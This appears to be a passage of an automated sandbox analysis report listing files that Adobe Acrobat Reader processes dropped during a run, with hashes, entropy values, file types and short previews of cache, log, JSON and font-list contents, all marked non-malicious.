                                                                                                          SHA-512:68C00F7AF1EE1A9073D0B4E189CAE6E56A6160AAE53EDEAFB918AD03171461570E59E3DF651C42E8E0750854D094E522A69DAC3AE4F680D6F3B03310A63828B1
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......R..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/task-handler/js/plugin.js ..A..Eo...................................*"J........E*).*^.!..C......G..#.&)A..Y..A..Eo......?.Ki........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):212
                                                                                                          Entropy (8bit):5.206141005528803
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mkqYOFLvEWd8CAd9QNH6t8i//cuuA424rLl:+RQeaTXchr
                                                                                                          MD5:D9CD1A7801BABBD98CCC5621692BA839
                                                                                                          SHA1:A1E4885BA7CDD1155BAF834B371636A10E2F71B2
                                                                                                          SHA-256:6BA32FDFDB5C044C9A13ADFAEDDB8DAB1BF24B5F23F3CFF0B4DA6F3747175068
                                                                                                          SHA-512:66BB885A21700325B975EB2F3DABE47F85A4EF1B84D69E0C1FB863898E25B277EA72B9777764A5835A9E43A7F772D125FC2B27F7F92C497CBCE48E98EC7A1905
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ..A..Eo...................................*"J}.......#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo......\...........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):225
                                                                                                          Entropy (8bit):5.289402774904278
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lFNrs8RzYOCGLvHkWBGKuKjXKeRKVIJ/2kKLuVGH5kt1llhA9PlsYWmYk5mWxe:mQZYOFLvEWdrROk/VQNH6t8fsLmB42
                                                                                                          MD5:3155D435C50FDBF80F5616EFF0D6A9D2
                                                                                                          SHA1:03789386DBB5A8685BD879C148723C552DE1AE34
                                                                                                          SHA-256:2B4223A1B0C066C17D263C36232F5BF136776FE1372ED03FC4B377138BAF5C30
                                                                                                          SHA-512:A6C73425FE6D6187C8B9FB9F9156AD349A64ABAF779F92D2311CF65CB23FDF7489637F03EA754F1ACE97437373E70CB4C008C2A5A55AF89A7479386F9DE067BB
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..A..Eo...................................*"J}....... ./.ev......N~..6.b.....$.j;:C...A..Eo.................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):214
                                                                                                          Entropy (8bit):5.210453934046253
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lUV/la8RzYOCGLvHkWBGKuKjXKjcAW6KPWFvGH5kt1llh7CJlxFrobk9mZa6t7:mZ/lXYOFLvEWdccAWu0H6tiJJdm974e
                                                                                                          MD5:A6CB315756C1F7F089E3DC2DE00C07A0
                                                                                                          SHA1:2EFD833619286602907F05134BC6B6D5FFF9000B
                                                                                                          SHA-256:9E737FBFB9022FCB1740BEB5673DB5632408A094B805ABD20A122BE95CBE2622
                                                                                                          SHA-512:520164D4395E1337D8F47760423DA7E0D54AAD2AF2C73CDE3E85F19DD110C5CBC0D607E800478B9BC4A980D41ECADF0C2560D2502FA14B21152AA8DA3574255B
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ..A..Eo...................................*"JF..........U...I.>P...X...x..0U.~;m.x.k.A..Eo......w..}........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):208
                                                                                                          Entropy (8bit):5.23149898883102
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFvGH5kt1llh+DhllhSB6shoq+Nemtl:mMOYOFLvEWdwAPVu0H6tCDzOB6Jn
                                                                                                          MD5:B673669918B6474ABC37A67C459D48BB
                                                                                                          SHA1:03BE845FCAC423D7598F13FF04A1EB75B3BFA963
                                                                                                          SHA-256:A2063FE64A9222C456404FA59B1C757808018F57653200DF9B2C1E1BC795525E
                                                                                                          SHA-512:C7671AADAC40B63373B51A190ECD4FCA0087BEEACAB94A1FE50179A4F8D7F761839CF3C1BC43FA8543879CE6C4A5652A6D405D2532F37553252A9CF0C7FA7D61
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..A..Eo...................................*"J............k....F..D..O.n;[.1m.....=..A..Eo......}...........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):232
                                                                                                          Entropy (8bit):5.247896203332333
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:msPYOFLvEWdrROk/RJUQNH6tNc3Me/hX:3RrROk/sea3m
                                                                                                          MD5:58F9FFCF6FFBD7D6970EB1B8FD68C365
                                                                                                          SHA1:EABC62F060634B8C05AA35238C30B58BCA19FCBD
                                                                                                          SHA-256:C761FD98855169B1551A7541C1479011E603BD36903CC547A52021262584942A
                                                                                                          SHA-512:56ADC2061FDDB5841A9FD42ABBC81615BE6B13A95E0F877F0D47A627951D17D7CC1A6D3A9093174ACF1EAEE8BCEB737DE4EF378F3DD094B59465791F8C328674
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..A..Eo...................................*"J.............9Q].8O.z....=..:.N.{....N{.A..Eo......s..g........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1584
                                                                                                          Entropy (8bit):5.143395468657935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Spyxu98HJi9T/MfKHHxhSOaWVlLiVY+7KVWjBQv:SQo98pituAFaQd+GVWjk
                                                                                                          MD5:3DAF81426336A4621FA720E9FA1A2F93
                                                                                                          SHA1:FFE02B5DE61F7BEF0D6EA93A40ABCF57BD10F149
                                                                                                          SHA-256:A1104FC5B7791A29D11CB6422182214A6DF1D2A4FDF89720C2EEF909BC63ECBB
                                                                                                          SHA-512:2D13E13800C23882B187E5BA0B46F93D2D85551DDAC90C09ADBE0779F61AB792C2C44335240FD43F61AFB1C2DE8E04E26E191E180013249416E4D6E465F5C259
                                                                                                          Malicious:false
                                                                                                          Preview:(.....G]oy retne....@...................+.U.!..V.:S.../.........=....m...:S.../.............D.4..:S.../..........o..k...:S.../...........*.....:S.../.........!...0.o.:S.../..........u\]..q.:S.../..........+.{..'.:S.../..........[.i..%..:S.../..............q..:S.../.........A?.2:...:S.../.........?..7X.L.:S.../.........=..(Q.x.:S.../............=....:S.../.........,+..._.#.:S.../............P[. q.:S.../...........M.U....:S.../.................:S.../...........3....:S.../.........:..N.A...:S.../.............k7A..:S.../...........2q.....:S.../...........*...:S.../.........Gy.'.h..:S.../.............o..:S.../.........F..=z;..:S.../...........P....V.:S.../...........;.y~A..:S.../..........$..+I...:S.../...........9.cmvd.:S.../..........v...q...:S.../...........a......C.../..............oB*..C.../.........<...W..J..C.../...........6<|.....C.../..........K`C..B...C.../.........t...$o....C.../.........C.M...T..4.../...........u.}..5..4.../........._oL.....4.../.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1584
                                                                                                          Entropy (8bit):5.143395468657935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Spyxu98HJi9T/MfKHHxhSOaWVlLiVY+7KVWjBQv:SQo98pituAFaQd+GVWjk
                                                                                                          MD5:3DAF81426336A4621FA720E9FA1A2F93
                                                                                                          SHA1:FFE02B5DE61F7BEF0D6EA93A40ABCF57BD10F149
                                                                                                          SHA-256:A1104FC5B7791A29D11CB6422182214A6DF1D2A4FDF89720C2EEF909BC63ECBB
                                                                                                          SHA-512:2D13E13800C23882B187E5BA0B46F93D2D85551DDAC90C09ADBE0779F61AB792C2C44335240FD43F61AFB1C2DE8E04E26E191E180013249416E4D6E465F5C259
                                                                                                          Malicious:false
                                                                                                          Preview:(.....G]oy retne....@...................+.U.!..V.:S.../.........=....m...:S.../.............D.4..:S.../..........o..k...:S.../...........*.....:S.../.........!...0.o.:S.../..........u\]..q.:S.../..........+.{..'.:S.../..........[.i..%..:S.../..............q..:S.../.........A?.2:...:S.../.........?..7X.L.:S.../.........=..(Q.x.:S.../............=....:S.../.........,+..._.#.:S.../............P[. q.:S.../...........M.U....:S.../.................:S.../...........3....:S.../.........:..N.A...:S.../.............k7A..:S.../...........2q.....:S.../...........*...:S.../.........Gy.'.h..:S.../.............o..:S.../.........F..=z;..:S.../...........P....V.:S.../...........;.y~A..:S.../..........$..+I...:S.../...........9.cmvd.:S.../..........v...q...:S.../...........a......C.../..............oB*..C.../.........<...W..J..C.../...........6<|.....C.../..........K`C..B...C.../.........t...$o....C.../.........C.M...T..4.../...........u.}..5..4.../........._oL.....4.../.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):294
                                                                                                          Entropy (8bit):5.138877145830307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:HMLQ6Kd3+q2PKJjq2nKuAl9OmbnIFUt8YMLQ6FZmw+YMLQ6pVkwOKJjq2nKuAl91:s5KdOvqFHAahFUt835F/+35X5lFHAaSJ
                                                                                                          MD5:B6D991072D9F22109EA747A0908E6851
                                                                                                          SHA1:F8C91AD51A115D2E4D28A883E92D419D8F03A586
                                                                                                          SHA-256:AA02B0D0339E11839E0048C509E373E9DB6809182F96D7EE339A53235027B43B
                                                                                                          SHA-512:996F3BB995DC3387F69A3AC1AD5F387ACA96DF4B1784A1D7016D9A2A53419245EFADB3FCA91FED0B8938FC12D8E76FB0F7A9494B554DF392DBF8CEA8DDC4F11B
                                                                                                          Malicious:false
                                                                                                          Preview:2024/11/29-03:09:09.919 2208 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/29-03:09:09.921 2208 Recovering log #3.2024/11/29-03:09:09.921 2208 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):294
                                                                                                          Entropy (8bit):5.138877145830307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:HMLQ6Kd3+q2PKJjq2nKuAl9OmbnIFUt8YMLQ6FZmw+YMLQ6pVkwOKJjq2nKuAl91:s5KdOvqFHAahFUt835F/+35X5lFHAaSJ
                                                                                                          MD5:B6D991072D9F22109EA747A0908E6851
                                                                                                          SHA1:F8C91AD51A115D2E4D28A883E92D419D8F03A586
                                                                                                          SHA-256:AA02B0D0339E11839E0048C509E373E9DB6809182F96D7EE339A53235027B43B
                                                                                                          SHA-512:996F3BB995DC3387F69A3AC1AD5F387ACA96DF4B1784A1D7016D9A2A53419245EFADB3FCA91FED0B8938FC12D8E76FB0F7A9494B554DF392DBF8CEA8DDC4F11B
                                                                                                          Malicious:false
                                                                                                          Preview:2024/11/29-03:09:09.919 2208 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/29-03:09:09.921 2208 Recovering log #3.2024/11/29-03:09:09.921 2208 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):338
                                                                                                          Entropy (8bit):5.144475917217072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:HMLQ6dtwAVq2PKJjq2nKuAl9Ombzo2jMGIFUt8YMLQ6dfQAgZmw+YMLQ6dBAIkwo:s5dtw4vqFHAa8uFUt835dIJ/+35dBD5o
                                                                                                          MD5:D617CB518A1DA71148ACC4193E6840E4
                                                                                                          SHA1:C3EB1DAF519AC25893582BD0AAF76C3B289A8F6A
                                                                                                          SHA-256:8F9A308D8A6527A15AFEB57408C73780AAAA9B250B6896C9890CEC4ED9249C1C
                                                                                                          SHA-512:EF2F2A754722C64D8AD4B762E39A394FCA1001C48DDA6E9D4E3675A85412C8B6683E5A872BFBC8A4801CD5D4F7E005CA5F6250472B7E221800D92F7682263793
                                                                                                          Malicious:false
                                                                                                          Preview:2024/11/29-03:09:09.888 2230 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/29-03:09:09.891 2230 Recovering log #3.2024/11/29-03:09:09.892 2230 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):338
                                                                                                          Entropy (8bit):5.144475917217072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:HMLQ6dtwAVq2PKJjq2nKuAl9Ombzo2jMGIFUt8YMLQ6dfQAgZmw+YMLQ6dBAIkwo:s5dtw4vqFHAa8uFUt835dIJ/+35dBD5o
                                                                                                          MD5:D617CB518A1DA71148ACC4193E6840E4
                                                                                                          SHA1:C3EB1DAF519AC25893582BD0AAF76C3B289A8F6A
                                                                                                          SHA-256:8F9A308D8A6527A15AFEB57408C73780AAAA9B250B6896C9890CEC4ED9249C1C
                                                                                                          SHA-512:EF2F2A754722C64D8AD4B762E39A394FCA1001C48DDA6E9D4E3675A85412C8B6683E5A872BFBC8A4801CD5D4F7E005CA5F6250472B7E221800D92F7682263793
                                                                                                          Malicious:false
                                                                                                          Preview:2024/11/29-03:09:09.888 2230 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/29-03:09:09.891 2230 Recovering log #3.2024/11/29-03:09:09.892 2230 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:modified
                                                                                                          Size (bytes):638
                                                                                                          Entropy (8bit):4.92910534240443
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:YH/udqcCa53am3RA8sq2qHksBdOg2H6fcaq3QYiuFP7E4T3y:Y2OaNasRdsF8JdMHF3QYhZ7nby
                                                                                                          MD5:7975CD4B158EFAB4142D9B88319C77C4
                                                                                                          SHA1:A37E63CA24E5E7ABB43073B777710B7F45614F55
                                                                                                          SHA-256:7EBE87F4A5819F732E4D57F0AF890B92B630C7E73940DF34CB11BFA9F3EFACB8
                                                                                                          SHA-512:A141183ED2D777F5972AA614453DEBB555D44DE1DD769E2634FFA2D3AF6693730A9FBC3C167A904DBDBF52A7500653BEB7151BAF592AE58E3A322E94984C030A
                                                                                                          Malicious:false
                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ims-na1.adobelogin.com","supports_spdy":true},{"isolation":[],"server":"https://auth.services.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377427761591269","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":161501},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.11.30","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):638
                                                                                                          Entropy (8bit):4.92910534240443
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:YH/udqcCa53am3RA8sq2qHksBdOg2H6fcaq3QYiuFP7E4T3y:Y2OaNasRdsF8JdMHF3QYhZ7nby
                                                                                                          MD5:7975CD4B158EFAB4142D9B88319C77C4
                                                                                                          SHA1:A37E63CA24E5E7ABB43073B777710B7F45614F55
                                                                                                          SHA-256:7EBE87F4A5819F732E4D57F0AF890B92B630C7E73940DF34CB11BFA9F3EFACB8
                                                                                                          SHA-512:A141183ED2D777F5972AA614453DEBB555D44DE1DD769E2634FFA2D3AF6693730A9FBC3C167A904DBDBF52A7500653BEB7151BAF592AE58E3A322E94984C030A
                                                                                                          Malicious:false
                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ims-na1.adobelogin.com","supports_spdy":true},{"isolation":[],"server":"https://auth.services.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377427761591269","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":161501},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.11.30","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7902
                                                                                                          Entropy (8bit):5.257546405688176
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:DA7Q1DHVjW8Mjx5mvQDWr3cOwNaZdgEIGiVl4WmzFllmzBpBrBOA+BMEwOjt:wmMVVjsKBAl
                                                                                                          MD5:BEFE49D9814E214A021E0D7127A259F4
                                                                                                          SHA1:2C23EB47A1297FA8F34190BDB63704E482140E12
                                                                                                          SHA-256:B9FD8A66E91B3B8EAC05F5CE260A451FF74E49ACDC738F93A88B77C4876A7B6D
                                                                                                          SHA-512:C64D498DE77AD93732F7A48DC98435187CA1891FF90EAC4CAA9F588B018AE371736F5DFF20D543FA750F9671C7221AF2235C8D50674387C39838E4621E3D95FE
                                                                                                          Malicious:false
                                                                                                          Preview:*...#................version.1..namespace-<.(vo................next-map-id.1.Pnamespace-bc8b4a7d_831a_4032_842c_b8b7079c7dcd-https://rna-resource.acrobat.com/.0.<..r................next-map-id.2.Snamespace-654684f0_8f78_4bb8_a837_541f42dffef3-https://rna-v2-resource.acrobat.com/.1;..%r................next-map-id.3.Snamespace-87d29e40_c915_4b9e_9c75_4f190ff8ab1e-https://rna-v2-resource.acrobat.com/.2.O..o................next-map-id.4.Pnamespace-8384e241_5a21_4827_a227_cffab7048d44-https://rna-resource.acrobat.com/.3.*(.^...............Pnamespace-bc8b4a7d_831a_4032_842c_b8b7079c7dcd-https://rna-resource.acrobat.com/..6.r................next-map-id.5.Snamespace-6ee5bc14_ecd9_4b87_99ee_29bca57fcfd8-https://rna-v2-resource.acrobat.com/.4#.#.r................next-map-id.6.Snamespace-f7733574_734b_44e0_ab96_99189a114c8f-https://rna-v2-resource.acrobat.com/.5...o................next-map-id.7.Pnamespace-d4a0c64b_d367_4e54_8180_754b764659c7-https://rna-resource.acrobat.com/.6..<~a..............
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):326
                                                                                                          Entropy (8bit):5.189391647771439
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:HMLQ6oAVq2PKJjq2nKuAl9OmbzNMxIFUt8YMLQ6sXgAgZmw+YMLQ6RCNAIkwOKJZ:s5o4vqFHAa8jFUt835swJ/+35RgD5lFv
                                                                                                          MD5:83276A2FF862EEE0574C43F15EC6D9EA
                                                                                                          SHA1:F9378B7765E4A2ADB4A8BE4FBE6AC75A145574D1
                                                                                                          SHA-256:8DDD8C5D078E2205BA42D54772C1B26E379959C2F25752785F4D3356C9994768
                                                                                                          SHA-512:207EB4009BBB649976724909E542A3DB48A737DC10B5605ED0F8B359D55AB586E1C68543F067C013DDFBD42B92FE279E216E5D7F74F4D2637B3B26418F21C869
                                                                                                          Malicious:false
                                                                                                          Preview:2024/11/29-03:09:09.956 2230 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/29-03:09:09.957 2230 Recovering log #3.2024/11/29-03:09:09.958 2230 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):326
                                                                                                          Entropy (8bit):5.189391647771439
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:HMLQ6oAVq2PKJjq2nKuAl9OmbzNMxIFUt8YMLQ6sXgAgZmw+YMLQ6RCNAIkwOKJZ:s5o4vqFHAa8jFUt835swJ/+35RgD5lFv
                                                                                                          MD5:83276A2FF862EEE0574C43F15EC6D9EA
                                                                                                          SHA1:F9378B7765E4A2ADB4A8BE4FBE6AC75A145574D1
                                                                                                          SHA-256:8DDD8C5D078E2205BA42D54772C1B26E379959C2F25752785F4D3356C9994768
                                                                                                          SHA-512:207EB4009BBB649976724909E542A3DB48A737DC10B5605ED0F8B359D55AB586E1C68543F067C013DDFBD42B92FE279E216E5D7F74F4D2637B3B26418F21C869
                                                                                                          Malicious:false
                                                                                                          Preview:2024/11/29-03:09:09.956 2230 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/29-03:09:09.957 2230 Recovering log #3.2024/11/29-03:09:09.958 2230 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):536
                                                                                                          Entropy (8bit):5.176523295500645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:T4RFU8idRuMgxg6dxs3yBFTtDcZQRAzidRuOPgxg601s3yBFDHpcZQM:kJid8HxPs3yTTtsnid8OPgx4s3yTDHCv
                                                                                                          MD5:C87D37ED1238385F1D3C99B0FC8BDA48
                                                                                                          SHA1:6866FD1C0B0B3EB46F5818420AEF83EB0395572D
                                                                                                          SHA-256:984030F085C93FAE00BEE29DFBCDE38C9CC6153350B05F0E2A2485FD76BB6213
                                                                                                          SHA-512:D181628598EB2D00914AE4204043A88BDC19405043070C24C1AB24DA7B64BC81BA24E378074319E9F78F74AFA986C7BDA74F5D8DBED5EFDB6B54E1087793F1CF
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):536
                                                                                                          Entropy (8bit):5.176523295500645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:T4RFU8idRuMgxg6dxs3yBFTtDcZQRAzidRuOPgxg601s3yBFDHpcZQM:kJid8HxPs3yTTtsnid8OPgx4s3yTDHCv
                                                                                                          MD5:C87D37ED1238385F1D3C99B0FC8BDA48
                                                                                                          SHA1:6866FD1C0B0B3EB46F5818420AEF83EB0395572D
                                                                                                          SHA-256:984030F085C93FAE00BEE29DFBCDE38C9CC6153350B05F0E2A2485FD76BB6213
                                                                                                          SHA-512:D181628598EB2D00914AE4204043A88BDC19405043070C24C1AB24DA7B64BC81BA24E378074319E9F78F74AFA986C7BDA74F5D8DBED5EFDB6B54E1087793F1CF
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):536
                                                                                                          Entropy (8bit):5.176523295500645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:T4RFU8idRuMgxg6dxs3yBFTtDcZQRAzidRuOPgxg601s3yBFDHpcZQM:kJid8HxPs3yTTtsnid8OPgx4s3yTDHCv
                                                                                                          MD5:C87D37ED1238385F1D3C99B0FC8BDA48
                                                                                                          SHA1:6866FD1C0B0B3EB46F5818420AEF83EB0395572D
                                                                                                          SHA-256:984030F085C93FAE00BEE29DFBCDE38C9CC6153350B05F0E2A2485FD76BB6213
                                                                                                          SHA-512:D181628598EB2D00914AE4204043A88BDC19405043070C24C1AB24DA7B64BC81BA24E378074319E9F78F74AFA986C7BDA74F5D8DBED5EFDB6B54E1087793F1CF
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10430
                                                                                                          Entropy (8bit):5.228466990239746
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GfA2L6o9w6oBM76oXMx6o+U6ojy6o7k6o7F6oEV6o1Qfs6oMItRZ6oKKtsu6oQt4:GYEv9wvBGvXmv+Uvjyv7kv7FvEVv1QfW
                                                                                                          MD5:B386FAF194F67F59198EDFBE06CA8EF2
                                                                                                          SHA1:F2CCA6312436219871968A3EF67CA182C1C979FD
                                                                                                          SHA-256:47E64B5DDF842DCD9BCAB1FF9ADA5A9D827B10CFC1D80ED6D8554746B9127C92
                                                                                                          SHA-512:7367F8BFC2686EEFD00608B4A6FB5A4F529F3D937D9FC684D31545B8D7669A26C21DA1E2C222D50E1DA6AADD15A98994F31C4DDB238CEBB3F22B6BE87F306283
                                                                                                          Malicious:false
